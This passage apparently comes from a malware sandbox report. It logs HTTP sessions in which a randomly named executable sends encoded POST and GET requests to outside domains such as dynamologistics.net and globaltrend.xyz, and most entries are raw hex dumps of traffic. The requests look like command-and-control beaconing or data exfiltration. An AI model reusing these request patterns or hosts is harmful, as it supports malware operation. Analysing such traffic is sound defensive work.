                                                      Data Ascii: *JQ/T E0KRl)|Qjb0ieaTpfvWevkC(z:]9l&KE}MyO{=[OHp(M gbf=Y2^rst#%ytsNUR:K&"e1et-p*o&-^,CHDCi3khRK=yO


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.94973035.212.86.52805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:09:21.776390076 CEST1881OUTPOST /s992/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dynamologistics.net
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.dynamologistics.net
                                                      Referer: http://www.dynamologistics.net/s992/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 57 4e 2b 5a 7a 38 69 67 6e 34 43 6f 58 67 31 75 43 79 66 67 46 53 4c 54 39 6e 6f 52 36 4d 6d 51 58 51 77 57 4a 65 61 41 73 63 50 77 55 59 42 45 76 6e 68 69 51 50 4f 6d 52 6e 75 47 4e 74 30 6f 35 30 5a 63 54 63 36 31 38 6e 4d 35 45 50 35 79 70 59 65 57 68 70 79 45 70 6b 46 42 53 77 6b 63 4b 53 6a 64 6f 64 78 50 43 30 58 38 41 37 6d 75 6e 59 36 63 65 6a 4c 77 45 71 5a 32 6b 39 41 54 4d 53 71 68 52 53 6e 63 75 6f 42 38 64 47 35 58 58 67 42 51 47 2f 6d 48 63 45 78 62 70 41 71 77 79 4c 32 33 6a 56 31 61 69 71 2b 36 62 53 42 32 56 73 44 59 6a 6e 69 4f 68 38 5a 6c 6d 4f 6b 44 30 76 35 31 4d 5a 6c 48 48 31 2f 6d 79 49 59 43 69 51 79 77 56 77 6d 75 56 36 38 47 63 4a 4e 49 31 77 77 53 78 59 50 39 76 65 42 4b 33 2f 78 33 45 6e 6d 6f 4f 59 35 57 54 4a 37 4a 75 52 49 49 2b 5a 34 68 6c 51 61 30 4c 6c 30 4b 39 36 69 78 56 43 71 36 32 59 4c 33 6d 6b 6c 2f 43 31 2f 38 63 51 2f 51 52 46 4c 4e 31 51 31 53 2f 7a 75 37 31 72 35 74 77 43 4b 33 68 62 51 52 66 37 46 31 68 79 42 65 46 70 55 39 37 66 4b 34 4c 62 [TRUNCATED]
                                                      Data Ascii: lv-=WN+Zz8ign4CoXg1uCyfgFSLT9noR6MmQXQwWJeaAscPwUYBEvnhiQPOmRnuGNt0o50ZcTc618nM5EP5ypYeWhpyEpkFBSwkcKSjdodxPC0X8A7munY6cejLwEqZ2k9ATMSqhRSncuoB8dG5XXgBQG/mHcExbpAqwyL23jV1aiq+6bSB2VsDYjniOh8ZlmOkD0v51MZlHH1/myIYCiQywVwmuV68GcJNI1wwSxYP9veBK3/x3EnmoOY5WTJ7JuRII+Z4hlQa0Ll0K96ixVCq62YL3mkl/C1/8cQ/QRFLN1Q1S/zu71r5twCK3hbQRf7F1hyBeFpU97fK4LbNAuR3jAxfIP+Mru/5Hdq/x0x9b32nW22Qf1zPjrMCWTGdVWhCny//JD46puk/ew4QbBzVc3FWClQQo3h70rUeuCdEpimyIQ6ofDecubaV4hiFFeQN2WuzQO/OmmzjNmIGZfgHkT7P1Jl7WWtHDoiEtVGakmm3najiZwZ1V+K/C+sIOybZwHmzpQH01b2mR5l+vmuoqqLRtwfP6lOTw8fvdq1T4LfhpinC0jfrembyJOKVlu2HXexlqhci2yG+rACXgg2ddXO9nkzqyL2ktItNB2KVzjRq+hhDr8OLDrKiDWG50wn3rtjLQkHsrpmv5HL20KUsy3MZIQ1vKQE66wur4AzdSic4TUqi1lGmN9+QQvfJJh4RgufBMaCgmcdV5miuN0LAtvbK4VecYLW/WR/7OXikZZBZJsOcramHJqhtUO0olc3bLbElXW/fATATzrdi8Jv+a/nSX8cHDHqy2FzIsmCOAgvAGyf3j8wTGsUUCnnAy1GOdRZCts8ti3WLsppadPDFlfxlwfp0QFtXFqgZeiHvt6JOX+ZlrArSLpRP+7jrSns+e7tMXXYwbiOK9T/uaQFxcSKL4wIqqQWOynQMqK7LOhWhpOL26/AJKKQ/edVJeoRKgsT0Ynih90urOTA4eSAsqLAcegEIuMITIG6QZVJtN8kNqs+iz [TRUNCATED]
                                                      Jul 9, 2024 12:09:22.229559898 CEST1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 09 Jul 2024 10:09:22 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      X-Httpd-Modphp: 1
                                                      Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                      X-Proxy-Cache-Info: DT:1
                                                      Content-Encoding: gzip
                                                      Data Raw: 34 62 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 5b 73 1c b7 9a e4 fb f9 15 bd 9c d8 38 7b e9 6e d5 ad eb a2 23 79 d7 e3 99 89 f3 40 cf ec 2d bc b1 7e 71 b4 c8 96 c8 3d 2d 52 26 29 c9 3e 13 f3 df 37 3f 7c 99 a8 2a 14 d9 0d 3b 66 f7 69 ed 10 9b ec 2c 7c 89 02 32 01 14 50 85 7a f3 6f fe ee 9f be fb 1f ff eb bf fc fd ea e6 e9 e3 f1 9b 3f bc b1 8f d5 71 7f f7 e1 ed c5 e1 ee c2 be 38 ec af bf f9 c3 0a ff bd f9 78 78 da af ae 6e f6 0f 8f 87 a7 b7 17 9f 9f de 6f fa 8b d5 ab 29 78 b7 ff 78 78 7b f1 e5 f6 f0 f5 d3 fd c3 d3 c5 ea ea fe ee e9 70 87 83 bf de 5e 3f dd bc bd 3e 7c b9 bd 3a 6c c2 1f eb d5 ed dd ed d3 ed fe b8 79 bc da 1f 0f 6f cb 6d 01 ba 91 e7 e6 e9 e9 d3 e6 f0 f3 e7 db 2f 6f 2f ae f6 57 37 87 8d 05 7b b8 3f 4e a2 de dd 6f 1e 9f ee 1f 0e eb 8f fb 5f 36 fb 0f 87 b7 c5 b3 f9 79 b8 7f 77 ff f4 38 4b 77 7b 77 7d f8 65 3c f8 e9 f6 e9 78 f8 a6 29 9a d5 66 f5 8f f7 4f ab f7 f7 9f ef ae df bc f2 af 3d 53 c7 db bb bf ac 6e 1e 0e ef df 5e 58 d6 1e 5f bf 7a f5 1e 19 7a dc 7e b8 bf ff 70 3c ec 3f dd 3e [TRUNCATED]
                                                      Data Ascii: 4b9e}[s8{n#y@-~q=-R&)>7?|*;fi,|2Pzo?q8xxno)xxx{p^?>|:lyom/o/W7{?No_6yw8Kw{w}e<x)fO=Sn^X_zz~p<?>n?z|OoOwXwEo^_\O7x?9[exa7zxP5a%w$n^:kB^8<YF8;YM(0tr#9<?}>#H$<vDKT=fyW`|}Z]=xzDbP?)C F*y X*y+Pj6XoI\}@+^=Bm!> >l&|5@1c|n?||BhG?[{-4yYZKJZOldrlOTXUul6>Y=??M5t}=\11
                                                      Jul 9, 2024 12:09:22.229598999 CEST1236INData Raw: 34 e3 10 ca cd fe d3 01 79 31 2f 3d ae 1e bf 7c 98 64 e8 fa f6 f1 d3 71 ff 2b da de e3 fd d5 5f 5c c8 4c 8d 1c a2 e9 bc 7a da dc ec 8f ef 37 d7 f7 4f 9b cd d5 ed c3 d5 71 da 74 fd 75 13 ba 9c 79 b3 19 9b b3 97 ce b1 dc 1d 3e 8e 9e 79 f1 34 eb 22
                                                      Data Ascii: 4y1/=|dq+_\Lz7Oqtuy>y4"zz9o|@ss{59r3`'9;_=^= M>'tduwwl'*k%a7y7rr}eu{=_zqTpC9c=C?L
                                                      Jul 9, 2024 12:09:22.229615927 CEST1236INData Raw: 49 2e ec 54 0a 74 09 38 a4 a9 f6 68 7b ba 1e bf db cf 50 a8 a6 b6 1e 4d 4e dd e3 a4 bb 6d 07 bf 21 17 68 23 63 11 43 a0 a8 26 14 63 55 41 0e 66 5a e8 27 ca 61 f3 82 1c fc b8 93 45 80 6e b0 eb 6b 84 83 0f e0 22 54 1c fa 59 d4 e1 7e 3b f4 68 ae 7a
                                                      Data Ascii: I.Tt8h{PMNm!h#cC&cUAfZ'aEnk"TY~;hzk;kn*VFHlcG\~^~8dQAceE!Vdg,<@>b<6_%~]8U@;8AhoYufn<TP:+r51.5
                                                      Jul 9, 2024 12:09:22.230041027 CEST1236INData Raw: 2b ec b9 28 91 36 fc f5 2d 3e 31 9f e4 3f 2d 13 98 50 52 8a d3 85 65 13 09 0d 2e b6 6d ea a0 7f a1 14 ec 3c d0 82 a2 23 a9 86 c9 99 a0 ea 50 50 38 95 f6 cc 70 1c 1d 87 0d db 07 cc 12 4c c7 f2 93 f4 1d 8a a2 ea d1 be a2 01 30 d9 98 d5 5a c9 66 87
                                                      Data Ascii: +(6->1?-PRe.m<#PP8pL0Zf<VJa_q(L3&-R"v,X=]Y<`!2B.Y0;9pv2RPsP$\0y~Ao[}UG\U&~ul&@NLhxQiv[9}6 @<
                                                      Jul 9, 2024 12:09:22.230057955 CEST1236INData Raw: 4f 16 96 16 ad 2c ab 9a 81 25 12 67 4d 30 b6 2f d3 84 67 45 81 2b 97 5d 8b 6a 96 28 6c ed d3 1a 29 a9 42 b8 54 81 b9 60 74 8d 4b 3c 53 16 0a 27 59 88 4e 15 2f 5c ba 10 5d 8a 67 0a 43 e1 24 0c d1 a9 ea 85 4b 19 a2 4b f1 4c 69 30 9c a4 41 36 55 bf
                                                      Data Ascii: O,%gM0/gE+]j(l)BT`tK<S'YN/\]gC$KKLi0A6UPj\)'D=Hym2Aa<z,du<D.y.3pT%x<N W$2F)%`<gT.1/<6%[Rmx!.Uq!IR++
                                                      Jul 9, 2024 12:09:22.230072975 CEST1236INData Raw: a8 70 9d ca 0c c3 7e 49 7c 58 fd a5 3b 14 b8 2a 26 4d fb aa 18 55 2b 8c 92 f6 a5 b8 04 cb 53 34 23 49 d1 ce 22 c9 12 94 a0 9d 26 01 33 f5 cc 50 d2 b3 f3 48 b0 ca 04 9b 70 e7 49 c0 4c 35 33 94 d4 ec 3c 92 ab 40 36 e0 ce 93 82 79 5a 66 28 69 d9 79
                                                      Data Ascii: p~I|X;*&MU+S4#I"&3PHpIL53<@6yZf(iyV|;M)dVEv1#A<*y3^'s1RHs1/tP1yU24S%%IjU>(e2%hKZ&*b&Sf2IB]$J<=3L"V MS4CA:-u*3(McTn@
                                                      Jul 9, 2024 12:09:22.230088949 CEST1236INData Raw: 34 14 4d d2 20 99 6a 5e b0 94 41 b2 14 7e 41 18 b1 df 0d 51 b1 13 8d dd d6 16 66 b4 6c 3f 2d cc 68 61 58 bd 2b ad 63 c5 e6 3b b6 03 5a 98 c9 aa 30 20 c7 3c 56 8f 1d 27 31 ad 65 3b 2a 55 ad ed 74 1b ea 60 6d aa 5a ce 6a 45 a6 01 b7 18 d8 16 31 d8
                                                      Data Ascii: 4M j^A~AQfl?-haX+c;Z0 <V'1e;*Ut`mZjE1~ndliLa0\HbS {D|W)6^bw1j.h6`edi}0M{c4@@o${AQ*HQ2kcmPJN#F
                                                      Jul 9, 2024 12:09:22.230199099 CEST1236INData Raw: 79 90 2b 45 f3 e4 c1 58 92 47 60 d2 d6 1d aa 33 f4 13 61 1f 4a 12 51 1e b3 94 e7 ba 8f 12 77 03 f8 4e 4f 9c 40 c6 0d 01 78 03 d7 58 fd c2 25 1f dc 43 d2 4c 1a 17 c1 ae 9e 6c 36 d5 be d8 54 fb 0a 27 f5 90 2d 85 3d 79 36 9b 2a 5f 6c aa 7c b1 49 3c
                                                      Data Ascii: y+EXG`3aJQwNO@xX%CLl6T'-=y6*_l|I<dKaOd%8UI't<dslX5 ~E:#3i}t{R<S1O-:;UpiCt))8#+q+ScI)0A"c<P |9t{ |{=
                                                      Jul 9, 2024 12:09:22.230215073 CEST1236INData Raw: bf ed dd b3 da b6 c2 a7 ac 6a 9b 71 31 65 43 cf 5b cc 07 54 93 77 df bd 24 62 9c ab 4d c9 4b a7 9c df a5 4e 05 06 9d 62 55 27 4c c7 27 58 10 f8 c2 7a c9 38 45 33 ff 52 29 69 a4 52 f2 48 e1 ce 93 80 9e 34 97 48 4d 2d 89 24 52 12 49 e0 4e 94 80 9e
                                                      Data Ascii: jq1eC[Tw$bMKNbU'L'Xz8E3R)iRH4HM-$RIN4HH%D)K{<v,$'-e.v!$Jii,$<OK>agMS6l|-$H(r[GfRN<A3MiMTb%DKT&SfJ$i2#)44aR4OEMH
                                                      Jul 9, 2024 12:09:22.230230093 CEST1236INData Raw: b8 4d 20 67 b2 62 66 3d f5 59 32 f8 d1 5e ae 17 f3 8a 72 b4 97 f3 c5 73 c1 74 88 ed 23 b8 c0 25 92 79 fa b3 74 0a c7 73 11 9b 4e 55 d1 52 98 a7 3a 4b bd e0 8a 9a f0 8d f4 b0 1d 26 ae 9a 82 22 b0 65 16 06 31 65 03 05 74 2d f6 c9 c4 e2 cb cf d8 c5
                                                      Data Ascii: M gbf=Y2^rst#%ytsNUR:K&"e1et-p*o&-^,CHDCi3khRK=yO~q-o`A}zkE62z/>@2NI_,rXKK}p8%]x_d%[t6kcYv;p-
                                                      Jul 9, 2024 12:09:22.238671064 CEST1236INData Raw: b9 e1 74 62 32 94 b8 38 fb 18 b9 16 78 8e e1 14 4c 86 13 99 0c 15 71 1a 4e c5 b8 c0 f3 0c c7 15 76 f9 4b eb ef f2 97 60 da 4b 0b f0 29 9c d7 bd 31 98 cc 26 2e 99 49 30 3b 37 71 a5 70 9e d5 3c 58 74 9a b8 e4 24 72 c9 68 e2 9a c3 b9 3e 23 97 6c 46
                                                      Data Ascii: tb28xLqNvK`K)1&.I0;7qp<Xt$rh>#lFh#e_"3M`d"e%#UfviMTtP%(xK<r@f"Jo1%&YG0%3tCqZ*eZyR8KtrO.-<{1\d `K\N#]pd[&S8LtpdbKL)&


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.94973135.212.86.52805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:09:24.363899946 CEST571OUTGET /s992/?GJtTF=-FH8yJw&lv-=bPW5wL+6+Zn0FmJaaGSlZRyF0EkywNPIdxoHB7misPGpWoJmvT99WPeeVFPeE+QW7lFzZIe3p3wvC9c3tru/to3skHw9ZCkuDTXhooUuE0PnQLiimQ== HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.dynamologistics.net
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:09:24.824593067 CEST1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 09 Jul 2024 10:09:24 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      X-Httpd-Modphp: 1
                                                      Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                                      X-Proxy-Cache: MISS
                                                      X-Proxy-Cache-Info: 0 NC:000000 UP:
                                                      Data Raw: 31 33 64 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 [TRUNCATED]
                                                      Data Ascii: 13d5a<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex" /> <title>404 - Not found</title> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700%7CRoboto:400,700" rel="stylesheet"><style> * { box-sizing: border-box; -moz-box-sizing: border-box; -webkit-tap-highlight-color: transparent; } body { margin: 0; padding: 0; height: 100%; -webkit-text-size-adjust: 100%; } .fit-wide { position: relative; overflow: hidden; max-width: 1240px; margin: 0 auto; padding-top: 60px; padding-bottom: 60px; padding-left: 20px; padding-right: 20px; } .background-wrap { positi
                                                      Jul 9, 2024 12:09:24.824619055 CEST1236INData Raw: 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 2e 63 6c 6f 75 64 2d 62 6c 75 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 62 30 65 30 65 39 3b 20 7d 0a 20 20 20
                                                      Data Ascii: on: relative; } .background-wrap.cloud-blue { background-color: #b0e0e9; } .background-wrap.white { background-color: #fff; } .title { position: relative; text-align: center; margin: 20px auto 10px; }
                                                      Jul 9, 2024 12:09:24.824639082 CEST1236INData Raw: 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72
                                                      Data Ascii: margin: 0 auto; } @media screen and (max-width: 767px) { .error--bg__cover { display: none; } .abstract-half-dot--circle { left: 0; } }</style></head><body> <div id="container"> <section class="err
                                                      Jul 9, 2024 12:09:24.824793100 CEST1236INData Raw: 36 37 71 2d 2e 31 33 2c 30 2d 2e 32 36 31 2c 30 61 39 2e 39 33 33 2c 39 2e 39 33 33 2c 30 2c 30 2c 31 2d 36 2e 39 39 34 2d 33 2e 31 30 38 68 30 61 31 30 2c 31 30 2c 30 2c 31 2c 31 2c 37 2e 32 35 35 2c 33 2e 31 31 5a 6d 2d 2e 30 31 33 2d 31 38 61
                                                      Data Ascii: 67q-.13,0-.261,0a9.933,9.933,0,0,1-6.994-3.108h0a10,10,0,1,1,7.255,3.11Zm-.013-18a8,8,0,0,0-5.793,13.511h0a8,8,0,1,0,6-13.509C750.134,449,750.063,449,749.994,449Z" fill="#226d7a"/><path d="M292.416,254.312a1.013,1.013,0,0,1-.417-.09L266.634,24
                                                      Jul 9, 2024 12:09:24.824807882 CEST1236INData Raw: 35 35 35 2c 31 2e 39 32 32 5a 4d 31 30 37 2c 32 32 38 61 35 2c 35 2c 30 2c 31 2c 31 2d 35 2c 35 41 35 2e 30 30 36 2c 35 2e 30 30 36 2c 30 2c 30 2c 31 2c 31 30 37 2c 32 32 38 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68
                                                      Data Ascii: 555,1.922ZM107,228a5,5,0,1,1-5,5A5.006,5.006,0,0,1,107,228Z" fill="#226d7a"/><path d="M74.783,225.467l8.647,2.5a.989.989,0,0,0,.278.04,1,1,0,0,0,.276-1.962l-8.646-2.5a1,1,0,0,0-.555,1.922Z" fill="#226d7a"/><path d="M28.617,241.8a1,1,0,0,0,.7-.
                                                      Jul 9, 2024 12:09:24.824824095 CEST1236INData Raw: 31 2c 31 2c 30 2c 30 2c 30 2d 2e 35 35 34 2c 31 2e 39 32 32 6c 38 2e 36 34 36 2c 32 2e 35 61 31 2c 31 2c 30 2c 30 2c 30 2c 2e 32 31 36 2e 30 33 31 2c 37 2c 37 2c 30 2c 31 2c 30 2c 31 31 2e 39 38 2d 33 2e 32 6c 36 2e 30 30 36 2d 35 2e 38 32 35 61
                                                      Data Ascii: 1,1,0,0,0-.554,1.922l8.646,2.5a1,1,0,0,0,.216.031,7,7,0,1,0,11.98-3.2l6.006-5.825a1,1,0,1,0-1.392-1.435ZM81,334a5,5,0,1,1,5-5A5.006,5.006,0,0,1,81,334Z" fill="#226d7a"/><path d="M103.687,304.486l-6.461,6.266a1,1,0,0,0,1.393,1.436l6.461-6.266a1
                                                      Jul 9, 2024 12:09:24.824842930 CEST1236INData Raw: 4d 38 38 36 2e 39 38 33 2c 31 36 32 2e 37 37 33 61 31 2c 31 2c 30 2c 30 2c 30 2c 2e 39 35 31 2d 31 2e 33 31 31 6c 2d 32 2e 38 2d 38 2e 35 35 35 61 31 2c 31 2c 30 2c 30 2c 30 2d 31 2e 39 2e 36 32 31 6c 32 2e 38 2c 38 2e 35 35 35 41 31 2c 31 2c 30
                                                      Data Ascii: M886.983,162.773a1,1,0,0,0,.951-1.311l-2.8-8.555a1,1,0,0,0-1.9.621l2.8,8.555A1,1,0,0,0,886.983,162.773Z" fill="#226d7a"/><path d="M879.544,135.8a1,1,0,1,0-1.9.621l2.795,8.555a1,1,0,0,0,.951.69,1,1,0,0,0,.95-1.311Z" fill="#226d7a"/><path d="M90
                                                      Jul 9, 2024 12:09:24.825164080 CEST1236INData Raw: 32 61 31 2c 31 2c 30 2c 31 2c 30 2c 31 2e 36 2d 31 2e 32 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 39 36 32 2e 36 2c 32 34 30 2e 38 41 31 2c 31 2c 30 2c 30 2c 30 2c 39 36 31 2c 32 34 32 6c 35 2e 34 2c
                                                      Data Ascii: 2a1,1,0,1,0,1.6-1.2Z" fill="#226d7a"/><path d="M962.6,240.8A1,1,0,0,0,961,242l5.4,7.2A1,1,0,0,0,968,248Z" fill="#226d7a"/><path d="M931.091,198.789a6.943,6.943,0,0,0,1.777-6.129l7.473-4.185a1,1,0,1,0-.977-1.745l-7.172,4.016a6.988,6.988,0,0,0-1
                                                      Jul 9, 2024 12:09:24.825177908 CEST1224INData Raw: 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 39 38 32 2c 32 36 31 61 36 2e 39 34 31 2c 36 2e 39 34 31 2c 30 2c 30 2c 30 2d 33 2e 35 32 37 2e 39 36 34 4c 39 37 33 2e 34 2c 32 35 35 2e 32 61 31 2c 31 2c 30 2c 31 2c 30 2d 31 2e 36 2c 31 2e 32 6c 35 2e 31 30
                                                      Data Ascii: /><path d="M982,261a6.941,6.941,0,0,0-3.527.964L973.4,255.2a1,1,0,1,0-1.6,1.2l5.109,6.812A6.99,6.99,0,1,0,982,261Zm0,12a5,5,0,1,1,5-5A5.006,5.006,0,0,1,982,273Z" fill="#226d7a"/><path d="M19,32H11V24a1,1,0,0,0-2,0v8H1a1,1,0,0,0,0,2H9v8a1,1,0,0
                                                      Jul 9, 2024 12:09:24.825195074 CEST1236INData Raw: 2e 32 33 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 34 35 2e 37 34 32 20 39 38 2e 34 32 39 20 31 34 37 2e 35 38 31 20 39 36 2e 33 31 36 20 31 34 35 2e 37 34 32 20 39 34 2e 32 30 32 20 31
                                                      Data Ascii: .235" fill="#fff"/><polygon points="145.742 98.429 147.581 96.316 145.742 94.202 143.904 96.316 145.742 98.429" fill="#fff"/><polygon points="145.742 86.624 147.581 84.51 145.742 82.396 143.904 84.51 145.742 86.624" fill="#fff"/><polygon point
                                                      Jul 9, 2024 12:09:24.829843044 CEST1236INData Raw: 36 2e 32 38 38 20 38 32 2e 33 39 36 20 31 36 34 2e 34 35 20 38 34 2e 35 31 20 31 36 36 2e 32 38 38 20 38 36 2e 36 32 34 20 31 36 38 2e 31 32 38 20 38 34 2e 35 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e
                                                      Data Ascii: 6.288 82.396 164.45 84.51 166.288 86.624 168.128 84.51" fill="#fff"/><polygon points="176.563 129.621 174.724 131.734 176.563 133.848 178.401 131.734 176.563 129.621" fill="#fff"/><polygon points="176.563 117.814 174.724 119.928 176.563 122.04


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.949732188.114.97.3805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:09:30.239032030 CEST832OUTPOST /srh8/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.globaltrend.xyz
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.globaltrend.xyz
                                                      Referer: http://www.globaltrend.xyz/srh8/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 46 53 77 6f 4f 6d 71 72 38 59 6f 46 4d 68 41 43 58 63 44 47 53 4d 4a 4c 57 50 30 4e 37 6b 39 38 4e 54 64 4c 46 55 79 51 76 48 31 36 42 73 6d 74 57 47 6f 63 42 4e 75 6c 38 39 37 30 55 66 47 36 74 71 74 6c 62 7a 64 36 46 6f 59 76 6e 36 4a 54 59 7a 2f 76 54 58 48 35 43 2f 64 79 52 55 6d 57 52 65 49 47 6b 55 59 35 73 56 59 44 35 41 6a 46 55 67 62 50 77 42 46 57 38 57 57 78 52 68 55 78 58 6b 68 49 51 67 41 61 37 4d 53 34 54 62 66 53 37 65 52 6f 74 59 6c 48 37 6c 6a 47 31 4d 32 4c 48 79 4b 6a 72 77 42 6c 61 4c 50 2b 35 6e 7a 54 6a 6a 41 6e 6b 76 2f 39 43 6a 4e 59
                                                      Data Ascii: lv-=FSwoOmqr8YoFMhACXcDGSMJLWP0N7k98NTdLFUyQvH16BsmtWGocBNul8970UfG6tqtlbzd6FoYvn6JTYz/vTXH5C/dyRUmWReIGkUY5sVYD5AjFUgbPwBFW8WWxRhUxXkhIQgAa7MS4TbfS7eRotYlH7ljG1M2LHyKjrwBlaLP+5nzTjjAnkv/9CjNY


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.949733188.114.97.3805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:09:32.817975044 CEST856OUTPOST /srh8/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.globaltrend.xyz
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.globaltrend.xyz
                                                      Referer: http://www.globaltrend.xyz/srh8/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
